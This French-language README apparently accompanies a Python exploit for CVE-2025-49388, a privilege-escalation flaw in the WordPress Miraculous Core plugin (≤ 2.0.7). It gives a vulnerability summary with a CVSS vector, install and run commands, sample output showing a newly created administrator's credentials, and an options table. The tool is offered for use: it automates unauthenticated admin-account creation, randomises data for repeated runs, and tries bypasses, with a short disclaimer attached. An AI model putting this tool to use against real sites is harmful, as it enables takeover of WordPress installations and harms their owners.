
Miraculous Core (kamleshyadav) ≤ 2.0.7 — Escalade de privilèges non authentifiée
Le plugin WordPress Miraculous Core Plugin <= 2.0.7 est vulnérable à l'élévation de privilèges
La vulnérabilité d'attribution de privilèges incorrecte dans le plugin Miraculous Core de kamleshyadav permet à des attaquants non authentifiés d'élever leurs privilèges et d'enregistrer des comptes administrateurs.
Versions affectées : n/a jusqu'à 2.0.7
CVSS 3.1 du CNA Patchstack :
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS du NIST : (Évaluation non encore fournie)
Ce script Python automatise l'exploitation de CVE-2025-49388 en enregistrant un nouveau compte administrateur sur des instances WordPress vulnérables avec le plugin Miraculous Core installé.
Il offre une haute fiabilité, randomise les données pour une exploitation répétée fiable, et gère automatiquement les en-têtes, cookies et tentatives de contournement.
Installer les dépendances :
pip install requests colorama
python CVE-2025-49388.py -u <url-cible> [OPTIONS]
Exemple :
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
Remarque :
Si vous omettez le nom d'utilisateur ou l'email, des valeurs aléatoires seront générées à chaque exécution pour éviter les erreurs de doublon.
[Nxploited INFO] Cible : http://cible/wp-admin/admin-ajax.php
[Nxploited INFO] Début de la tentative d'exploitation...
[Nxploited SUCCESS] Exploitation réussie ! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Nom d'utilisateur : Nxploited_4pQz1x
Mot de passe : Str0ng!Pass123
Email : [email protected]
Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.
L'exploitation non autorisée de systèmes sans autorisation explicite est illégale et contraire à l'éthique.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages. Utilisez-le de manière responsable.
| Option | Description | Exemple |
|---|
-u, --url | URL WordPress cible (obligatoire) | -u http://cible.com/wordpress |
-un, --username | Nom d'utilisateur souhaité (par défaut : aléatoire) | -un admin1337 |
-fn, --full_name | Nom complet (par défaut : Nxploited) | -fn "John Doe" |
-em, --useremail | Email (par défaut : aléatoire) | -em [email protected] |
-pw, --password | Mot de passe (par défaut : Str0ng!Pass123) | -pw MonSecret! |
-o, --output | Enregistrer les résultats dans un fichier | -o resultat.txt |